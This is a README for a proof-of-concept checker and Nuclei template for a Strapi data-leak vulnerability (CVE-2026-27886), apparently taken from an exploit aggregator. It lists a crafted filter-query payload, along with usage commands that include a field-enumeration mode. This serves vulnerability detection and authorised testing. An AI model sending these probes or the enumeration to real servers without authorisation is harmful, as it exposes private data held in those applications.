## https://sploitus.com/exploit?id=589E6F35-B762-5B4B-B0FB-962CF7D8A206
# CVE-2026-27886 Strapi PoC
> For authorized security testing only.
[Strapi leaking sensitive data via relational filtering due to lack of query sanitization](https://github.com/strapi/strapi/security/advisories/GHSA-rjg2-95x7-8qmx).
Includes:
* `CVE-2026-27886.py` - Python PoC
* `CVE-2026-27886.yaml` - Nuclei template for detection
## What it checks
The checker sends two requests to a public Strapi Content API collection endpoint:
```text
GET /api/
GET /api/?where[id][$lt]=-1
```
If the baseline response has records and the false `where` predicate collapses the result set to zero, the endpoint is likely vulnerable.
## Usage
### Python
Safe check:
```bash
python3 CVE-2026-27886.py http://strapi/api/articles
```
Field enumeration:
```bash
python3 CVE-2026-27886.py http://strapi/api/articles --enum-fields
```
### Nuclei
```bash
nuclei -t CVE-2026-27886.yaml -u http://strapi/api/articles
```